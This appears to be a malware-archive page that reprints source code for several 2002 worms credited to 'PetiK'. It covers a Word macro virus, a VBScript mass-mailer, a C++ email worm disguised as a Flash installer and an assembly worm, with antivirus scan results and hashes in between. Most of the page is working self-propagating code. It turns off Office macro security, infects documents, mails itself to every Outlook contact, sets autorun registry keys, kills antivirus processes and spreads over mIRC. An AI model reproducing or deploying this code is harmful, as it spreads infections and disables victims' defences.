T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Bubbleboy K7AntiVirus 7.10.737 2009.05.16 Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 VBS/Generic@MM McAfee+Artemis 5616 2009.05.15 VBS/Generic@MM McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.04 Microsoft 1.4602 2009.05.16 Virus:VBS/Petik NOD32 4080 2009.05.15 probably unknown SCRIPT Norman 6.01.05 2009.05.16 HTML/Worm.gen nProtect 2009.1.8.0 2009.05.16 VBS.Petik.K Panda 10.0.0.14 2009.05.16 Worm Generic PCTools 4.4.2.0 2009.05.16 VBS.Lovlind.A Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 VBS/Petik-N Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 HTML_LINDA.A VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family VirusBuster 4.6.5.0 2009.05.16 VBS.Lovlind.A Additional information File size: 2755 bytes MD5...: 43ac95142a5c7281246b68ef0584e079 SHA1..: 66758177710fcdd652c37671efe593f7651248e2

' ' ' '

Name : W97M.Wolf Author : PetiK Language : VBA Word Date : 25/02/2002

Attribute VB_Name = "Wolf" Sub AutoOpen() Call EndProtect Call Infection Call SearchF If Day(Now) = 15 Then Call Payload End Sub Sub HelpAbout() With Application.Assistant .Visible = True End With MsgBox "Very Thanx to Tex Avery. hahahahaha", vbInformation, "W97M.Wolf.A" Application.UserName = "My Name is Wolf" End Sub Sub AutoClose() With Dialogs(wdDialogFileSummaryInfo) .Author = "Wolf" .Title = "My Friend the Wolf" .Subject = "Tex Avery and the other" .Keywords = "Wolf, Tex Avery, Ed Love, Droopy" .Comments = "No comments" .Execute End With If Left(ActiveDocument.Name, 8) <> "Document" And ActiveDocument.Saved = False Then ActiveDocument.Save End If End Sub Sub Infection() On Error Resume Next Set Nor = NormalTemplate.VBProject.VBComponents Set Doc = ActiveDocument.VBProject.VBComponents DropFile = "C:\Wolf.sys" If Nor.Item("Wolf").Name <> "Wolf" Then Doc("Wolf").Export DropFile Nor.Import DropFile End If If Doc.Item("Wolf").Name <> "Wolf" Then Nor("Wolf").Export DropFile Doc.Import DropFile ActiveDocument.Save End If End Sub Sub SearchF() With Application.FileSearch .FileName = "*.doc" .LookIn = "C:\" .SearchSubFolders = False .FileType = msoFileTypeWordDocuments .Execute For I = 1 To .FoundFiles.Count FileSystem.SetAttr .FoundFiles(I), vbNormal Next I End With End Sub Sub EndProtect() With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With Select Case Application.Version Case "10.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

End Select WordBasic.DisableAutoMacros 0 End Sub Sub Payload() MyApp = Shell("notepad.exe", 1) SendKeys "This is my last Word97Macro virus.", True AppActivate (MyApp) End Sub

File Wolf.doc received on 05.11.2009 21:18:10 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6500 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.732 7.0.0.125 5612 5612 6.7.6 1.4602 4065 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.04.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 3.12.10.4 2009.5.11.1729 4.6.5.0 Last Update 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.07 2009.05.11 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.09 2009.05.11 2009.05.11 2009.05.11 2009.05.11 Result Virus.MSWord.Droopy.A!IK W97M/Droopy.B W2000M/Droopy.A W97M/Droopy.A MW97:Droopy family W97M/Beko W97M.Droopy.A a variant of virus W97M.Inadd WM.Pivis Virus.MSWord.Droopy W97M.Droopy W97M.Wolf.A W97M/Droopy.A W97M/Droopy.A Virus.MSWord.Droopy W97M/Droopy.A W97M.Droopy.A Virus.MSWord.Droopy.A Macro.Droopy Virus.MSWord.Droopy W97M/Generic W97M/Generic Macro.Droopy.A Virus:W97M/Droopy.A W97M/Droopy.A W97M/Droopy.A W97M.Droopy.A W97M/CokeBoy WORD.97.Flow.A Macro.Word97.Wolf.a WM97/Droopy-A W97M.Droopy (v) W97M.Droopy.A W2KM/Generico W97M_Generic Virus.MSWord.Droopy W97M.Droopy.A WORD.97.Flow.A

Additional information File size: 40960 bytes MD5...: 456d71a02c519c6a1f13fa9ffc899f2e SHA1..: 534f5ae68f8634c6c69a5b40ad131a4bf674d000

' ' ' '

Name : VBS/W97M.Doublet Author : PetiK Language : VBS Date : 02/03/2002

On Error Resume Next Set sf=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=sf.OpenTextFile(WScript.ScriptFullName,1) virus=fl.ReadAll fl.Close personal=ws.SpecialFolders("MyDocuments") sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\Doublet.vbs") Set vw=sf.CreateTextFile("C:\Doublet.sys") vw.WriteLine "Attribute VB_Name = ""Doublet""" vw.WriteLine "Sub AutoOpen()" vw.WriteLine "On Error Resume Next" vw.WriteLine "Call FuckProtect" vw.WriteLine "Call Infect" vw.WriteLine "End Sub" vw.WriteLine "" vw.WriteLine "Sub HelpAbout()" vw.WriteLine "If Day(Now) = 10 Then" vw.WriteLine "MsgBox ""W97M/VBS.Doublet. Hahahahaha"", vbInformation, ""For "" + Application.UserName" vw.WriteLine "End If" vw.WriteLine "End Sub" vw.WriteLine "" vw.WriteLine "Sub Infect()" vw.WriteLine "On Error Resume Next" vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents" vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents" vw.WriteLine "Drop = ""C:\Doublet.sys""" vw.WriteLine "If Nor.Item(""Doublet"").Name <> ""Doublet"" Then" vw.WriteLine " Doc(""Doublet"").Export Drop" vw.WriteLine " Nor.Import Drop" vw.WriteLine "End If" vw.WriteLine "If Doc.Item(""Doublet"").Name <> ""Doublet"" Then" vw.WriteLine " Nor(""Doublet"").Export Drop" vw.WriteLine " Doc.Import Drop" vw.WriteLine " ActiveDocument.Save" vw.WriteLine "End If" vw.WriteLine "End Sub" vw.WriteLine "" vw.WriteLine "Sub FuckProtect()" vw.WriteLine "With Options" vw.WriteLine " .ConfirmConversions = False" vw.WriteLine " .VirusProtection = False" vw.WriteLine " .SaveNormalPrompt = False" vw.WriteLine "End With" vw.WriteLine "Select Case Application.Version" vw.WriteLine "Case ""10.0""" vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&" vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&" vw.WriteLine "Case ""9.0""" vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&" vw.WriteLine "End Select" vw.WriteLine "WordBasic.DisableAutoMacros 0" vw.WriteLine "End Sub" vw.Close lecteur() ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD" ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD" ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD" Set out=CreateObject("Outlook.Application") Set MA=out.GetNameSpace("MAPI") For Each C In MA.AddressLists If C.AddressEntries.Count <> 0 Then

For D=1 To C.AddressEntries.Count tmpname="" randomize(timer) namel=int(rnd(1)*20)+1 For lettre = 1 To namel randomize(timer) tmpname=tmpname & chr(int(rnd(1)*26)+97) Next typext = "execombatbmpjpggifdocxlsppthtmhtthta" randomize(timer) tmpext = int(rnd(1)*11)+1 tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs" sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname) subject="Re: " & left(tmpname,len(tmpname)-4) & " for you." Set AD=C.AddressEntries(D) Set mail=out.CreateItem(0) mail.To=AD.Address mail.Subject=subject body="Hi " & AD.Name & "," body = body & VbCrLf & "Look at this attached found on the net." body = body & VbCrLf & "" body = body & VbCrLf & " See you soon" mail.Body=body mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname) mail.DeleteAfterSubmit=True If mail.To <> "" Then mail.Send sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname End If Next End If Next Set wrd=WScript.CreateObject("Word.Application") If wrd Is Nothing Then WScript.Quit wrd.Visible=False Set srch = wrd.Application.FileSearch srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc": srch.Execute For f = 1 To srch.FoundFiles.Count victim = srch.FoundFiles(f) wrd.Documents.Open victim Set Doc=wrd.ActiveDocument.VBProject.VBComponents If Doc.Item("Doublet").Name <> "Doublet" Then Doc.Import ("C:\Doublet.sys") wrd.ActiveDocument.Save End If wrd.ActiveDocument.Close Next wrd.Application.Quit Sub lecteur() On Error Resume Next dim f,f1,fc Set dr = sf.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then liste(d.path&"\") End If Next End Sub Sub infecte(dossier) On Error Resume Next Set sf=CreateObject("Scripting.FileSystemObject") Set f = sf.GetFolder(dossier) Set fc = f.Files For Each f1 in fc ext = sf.GetExtensionName(f1.path) ext = lcase(ext) if (ext="vbs") or (ext="vbe") Then Set cot=sf.OpenTextFile(f1.path, 1, False) If cot.ReadLine <> "'VBS/W97M.Doublet" then cot.Close Set cot=sf.OpenTextFile(f1.path, 1, False)

vbsorg=cot.ReadAll() cot.Close Set inf=sf.OpenTextFile(f1.path,2,True) inf.WriteLine "'VBS/W97M.Doublet" inf.Write(vbsorg) inf.WriteLine "" inf.WriteLine virus inf.Close End If End If Next End Sub Sub liste(dossier) On Error Resume Next Set f = sf.GetFolder(dossier) Set sf = f.SubFolders For Each f1 in sf infecte(f1.path) liste(f1.path) Next End Sub

File Doublet.vbs received on 05.16.2009 11:30:45 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.VBS.Doublet!IK VBS/Doublet Worm/Yumaho Worm/VBS.VBS VBS/Doublet.A@mm VBS:Doublet VBS/Telbound.A Generic.ScriptWorm.897E1D20 VBS/Doublet.A Worm.VBS.Yumao Worm.VBS.Agent.~H VBS.Doublet VBS.LoveLet3. VBS/Yuma VBS/Doublet.A@mm Email-Worm.VBS.Doublet VBS/Doublet.A@mm Generic.ScriptWorm.897E1D20 Email-Worm.VBS.Doublet Email-Worm.VBS.Doublet VBS/Dossier@MM VBS/Dossier@MM Worm.Yumaho Virus:VBS/Doublet.A VBS/Doublet.A VBS/Doublet.H VBS.Doublet.A@mm VBS/Doublet.A.worm VBS.Doubt.A Script.VBS.I-Worm.Doublet VBS/Telboud-A Macro.src VBS_Doublet.A Email-Worm.VBS.Doublet VBS.Doubt.A

Additional information File size: 5258 bytes MD5...: bdd4e8ab9db0d5e79474cb50f1f0ebda SHA1..: 303d4183f401e9bf707dab9d05d993e329f71753

/* Name : I-Worm.LiTeLo Author : PetiK Date : March 7th 2002 - March 10th 2002 Language : C++/HTML */ #include <stdio.h> #include <windows.h> #include <mapi.h> #pragma argused char filename[50],copysys[50],copyreg[50],htmf[50],fakemess[1024]; LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Uninst="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\LiteLo"; char dn[20]="Flash32 Uninstall",ust[40]; BYTE htmail[10]; DWORD Tmp,type=REG_SZ,shtmail=sizeof(htmail); LPTSTR cmdLine,ptr; BOOL installed,uninstall; HMODULE kernel32; FILE *htm; LHANDLE session; MapiMessage *mess; HINSTANCE WiNet,hMAPI; char messId[512],mname[50],maddr[30]; char htmms[]="<html><head><title>Flash Information</title></head>\n" "<body><script language=vbscript>\n" "On Error Resume Next\n" "msgbox \"Please accept ActiveX by clicking YES\",vbinformation,\"Flash32 NET\"\n" "Set abcgqlbg=CreateObject(\"Scripting.FileSystemObject\")\n" "Set gqlbgrlb=CreateObject(\"WScript.Shell\")\n\n" "If err.number=429 Then\n" "gqlbgrlb.Run javascript:location.reload()\n\n" "Else\n\n" "mess=\"Contact :\"\n" "Set bgqlbgqm=CreateObject(\"Outlook.Application\")\n" "Set mbgqlbgq=bgqlbgqm.GetNameSpace(\"MAPI\")\n" "For Each C In mbgqlbgq.AddressLists\n" "If C.AddressEntries.Count <> 0 Then\n" "For D=1 To C.AddressEntries.Count\n" "Set qlbgqlbg=C.AddressEntries(D)\n" "Set gqlcgqlb=bgqlbgqm.CreateItem(0)\n" "mess=mess &vbCrLf& qlbgqlbg.Address\n" "gqlcgqlb.To=qlbgqlbg.Address\n" "gqlcgqlb.Subject=\"New Version of Flash.\"\n" "gqlcgqlb.Body=\"Unlimited demo verion of Flash.\"\n" "gqlcgqlb.Attachments.Add(abcgqlbg.GetSpecialFolder(1)&\"\\Flash32.exe\")\n" "gqlcgqlb.DeleteAfterSubmit=True\n" "If gqlcgqlb.To <> \"\" Then\n" "gqlcgqlb.Send\n" "End If\n" "Next\n" "End If\n" "Next\n\n" "MsgBox mess,vbinformation,\"Flash Contact\"\n" "gqlbgrlb.RegWrite \"HKLM\\Software\\Microsoft\\HTMail\",\"OK\"\n" "gqlbgrlb.Run javascript:location.href=(\"http://www.flash.com\")\n" "End If\n" "</script></body></html>";

char *attname[]={"flash32.exe","flsh32eng.exe","flsh32fr.exe","new_flash.exe", "freeflash32.exe","installflash.exe","setupflash.exe"}; HKEY SYSTEMTIME hReg; systime;

BOOL (PASCAL FAR *INetConnect)(LPDWORD flags,DWORD reserved); ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG); ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);

ULONG (PASCAL FAR *mFreeBuffer)(LPVOID); int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { kernel32=GetModuleHandle("KERNEL32.DLL"); if(kernel32) { (FARPROC &)RegSerPro=GetProcAddress(kernel32,"RegisterServiceProcess"); if(RegSerPro) RegSerPro(NULL,1); } GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)copysys,100); strcpy(htmf,copysys); strcat(copysys,"\\Flash32.exe"); strcat(htmf,"\\FlashNet.htm"); installed=FALSE; uninstall=FALSE; cmdLine=GetCommandLine(); if(cmdLine) { for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++); if(ptr[0]=='-' && ptr[1]!=0) { switch(ptr[1]) { default: break; case 'i': installed=TRUE; break; case 'u': installed=TRUE; uninstall=TRUE; break; } } } if(!installed) { CopyFile(filename,copysys,FALSE); strcpy(copyreg,copysys); strcat(copyreg," -i"); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Flash32",0,REG_SZ,(BYTE *)copyreg,100); RegCloseKey(hReg); strcpy(ust,copysys); strcat(ust," -u"); RegCreateKey(HKEY_LOCAL_MACHINE,Uninst,&hReg); RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20); RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40); RegCloseKey(hReg); htm=fopen(htmf,"w"); fprintf(htm,"%s",htmms); fclose(htm); MessageBox(NULL,"Error : cannot open flash32.dll","ERROR",MB_OK|MB_ICONSTOP); ExitProcess(0); } if(uninstall) { RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg); RegDeleteValue(hReg,"Flash32"); RegCloseKey(hReg); RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall" ,0,KEY_ALL_ACCESS,&hReg); RegDeleteKey(hReg,"LiteLo"); RegCloseKey(hReg); RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_ALL_ACCESS,&hReg); RegDeleteValue(hReg,"HTMail"); RegCloseKey(hReg); DeleteFile(htmf); WritePrivateProfileString("rename","NUL",copysys,"WININIT.INI"); MessageBox(NULL,"Please restart the system.","Uninstall Flash32",MB_OK| MB_ICONHAND); ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);

ExitProcess(0); } // Check if we are connected WiNet=LoadLibrary("WININET.DLL"); if(!WiNet) { goto cworm; } (FARPROC &)INetConnect=GetProcAddress(WiNet, "InternetGetConnectedState"); if(!INetConnect) { FreeLibrary(WiNet); goto cworm; } while(INetConnect(&Tmp,0)!=TRUE) { Sleep(1000); } FreeLibrary(WiNet); RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"HTMail",0,&type,htmail,&shtmail); RegCloseKey(hReg); if(strcmp(htmail,"OK")!=0) { ShellExecute(NULL,"open",htmf,NULL,NULL,SW_SHOWMAXIMIZED); } cworm: hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) { strcpy(mname,mess->lpOriginator->lpszName); strcpy(maddr,mess->lpOriginator->lpszAddress); mess->ulReserved=0; mess->lpszSubject="New! New! Version of Flash"; mess->lpszNoteText="Hi,\nLook at this demo version of Flash.\n\nIt's easy and free."; mess->lpszMessageType=NULL; mess->lpszDateReceived=NULL; mess->lpszConversationID=NULL; mess->flFlags=MAPI_SENT; mess->lpOriginator->ulReserved=0; mess->lpOriginator->ulRecipClass=MAPI_ORIG; mess->lpOriginator->lpszName=mess->lpRecips->lpszName; mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress; mess->nRecipCount=1; mess->lpRecips->ulReserved=0; mess->lpRecips->ulRecipClass=MAPI_TO; mess->lpRecips->lpszName=mname; mess->lpRecips->lpszAddress=maddr; mess->nFileCount=1; mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mess->lpFiles, 0, sizeof(MapiFileDesc)); mess->lpFiles->ulReserved=0; mess->lpFiles->flFlags=NULL; mess->lpFiles->nPosition=-1; mess->lpFiles->lpszPathName=filename; mess->lpFiles->lpszFileName=attname[GetTickCount()&6]; mess->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mess, NULL, NULL); } }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mess->lpFiles); mFreeBuffer(mess); mLogoff(session,0,0,0); FreeLibrary(hMAPI); } }

File Litelo.exe received on 05.16.2009 17:51:36 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Backdoor.Win32.Hackarmy!IK Win32/Litelo.worm.28672 Worm/Petik.Flash.1 Worm/Win32.Win32 W32/Petik.G Win32:Trojan-gen {Other} I-Worm/Petik Win32.Petik.F@mm I-Worm.Petik Worm.Win32.Petik Win32.Petik.59904 Win32.Petik Win32/Petik.28672.B W32/Petik.G Email-Worm.Win32.Petik W32/Petik!worm Win32.Petik.F@mm Backdoor.Win32.Hackarmy Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick.ab.gen W32/PetTick.ab.gen Worm.Petik.Flash.1 Worm:Win32/Petick@mm Win32/Petik W32/Pet_Tick.28672.A Worm/W32.Petik.28672 Worm Generic.LC I-Worm.Petllo Medium Risk Malware Worm.Litelo W32/Petik-Q Email-Worm.Win32.Petik W95.Pet_Tick.gen Trojan/Hami WORM_PETIK.A Win32.HLLW.Litelo I-Worm.Petllo

Additional information File size: 28672 bytes MD5...: 4292a1ade77cb9e51e3de52101c99dcb SHA1..: b485fdd64fda5d12221f83be8c062588f051b2c6 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment # Name : I-Worm.Together Author : PetiK Date : March 10th 2002 - March 15th 2002 # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm PROCESSENTRY32 STRUCT dwSize cntUsage th32ProcessID th32DefaultHeapID th32ModuleID cntThreads th32ParentProcessID pcPriClassBase dwFlags szExeFile PROCESSENTRY32 ENDS include Useful.inc start_worm: call twin_worm: push mov push push api hide_worm DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? db 260 dup(?)

50 esi,offset orig_worm esi 0 GetModuleFileNameA

; esi = name of file

push 50 push offset verif_worm api GetSystemDirectoryA @pushsz "\EBASE64.EXE" push offset verif_worm api lstrcat mov push push push api add mov stosd mov stosd mov stosd pop push push api test jz push push push api edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax eax,"aBe\" eax,"46es" eax,"exe." edi offset orig_worm offset verif_worm lstrcmp eax,eax continue_worm 0 edi esi CopyFileA ; edi = %system%\eBase64.exe

; copy file

push 20 push edi push 1 @pushsz "Encode Base64"

@pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA ; regedit jmp end_worm

continue_worm: fuck_antivirus: @pushsz "OIFIL400.DLL" api LoadLibraryA test eax,eax jz end_fuck_antivirus push push api mov inc jz lea mov lea push push api checkfile: test jz push mov push cmp je lea 0 2 CreateToolhelp32Snapshot lSnapshot, eax eax end_fuck_antivirus eax,uProcess [eax.dwSize], SIZE PROCESSENTRY32 eax,uProcess eax lSnapshot Process32First eax, eax InfExpRetCl ecx eax,ProcessID offset uProcess eax,[uProcess.th32ProcessID] NextFile ebx,[uProcess.szExeFile]

verif macro verifname,empty local name ifnb <empty> %out too much arguments in macro 'nxt_instr' .err endif call name db verifname,0 name: push ebx api lstrstr test eax,eax endm verif jnz verif jnz verif jnz verif jnz verif jnz verif jnz verif jnz verif jnz verif jnz verif jnz verif "ARG" term "AVP32.EXE" term "AVPCC.EXE" term "AVPM.EXE" term "WFINDV32.EXE" term "F-AGNT95.EXE" term "NAVAPW32.EXE" term "NAVW32.EXE" term "NMAIN.EXE" term "PAVSHED.EXE" term "vshwin32.exe" ; Norton ; AVP ; AVP ; AVP

; F-SECURE ; Norton ; Norton

; PandaSoftware ; McAfee

jnz term verif "PETIKSHOW.EXE" jnz term @pushsz "ZONEALARM.EXE" push ebx api lstrstr test eax,eax jz NextFile term: push push push api test jz push push api push push api mov push api add sub mov lodsd mov lodsd push push push api push api NextFile: push push api jmp

; McAfee

[uProcess.th32ProcessID] 1 001F0FFFh OpenProcess eax,eax NextFile 0 eax TerminateProcess ebx offset new_name lstrcpy esi,offset new_name esi lstrlen esi,eax esi,4 [esi],"ktp." [esi],"kmz." 0 offset new_name ebx CopyFileA ebx DeleteFileA offset uProcess lSnapshot Process32Next checkfile

; ;

InfExpRetCl: push lSnapshot api CloseHandle end_fuck_antivirus: call Spread_Mirc call Spread_Worm e_s_w: end_worm: push api 0 ExitProcess

hide_worm Proc pushad @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx api GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret hide_worm EndP

; Registered as Service Process

Spread_Mirc Proc push offset copy_worm push offset mirc_exe api lstrcpy call @mirc db "C:\mirc\script.ini",0 db "C:\mirc32\script.ini",0 db "C:\progra~1\mirc\script.ini",0 db "C:\progra~1\mirc32\script.ini",0 @mirc: pop esi push 4 pop ecx mirc_loop: push ecx push 0 push 80h push 2 push 0 push 1 push 40000000h push esi api CreateFileA mov ebp,eax push 0 push offset byte_write @tmp_mirc: push e_mirc - s_mirc push offset s_mirc push ebp api WriteFile push ebp api CloseHandle @endsz pop ecx loop mirc_loop end_spread_mirc: ret Spread_Mirc EndP Spread_Worm Proc pushad push 50 push offset vbs_worm api GetSystemDirectoryA @pushsz "\eBase.vbs" push offset vbs_worm api lstrcat push push push push push push push api mov push push push push push api push api 0 20h 2 0 1 40000000h offset vbs_worm CreateFileA ebp,eax 0 offset byte_write e_vbs - s_vbs offset s_vbs ebp WriteFile ebp CloseHandle

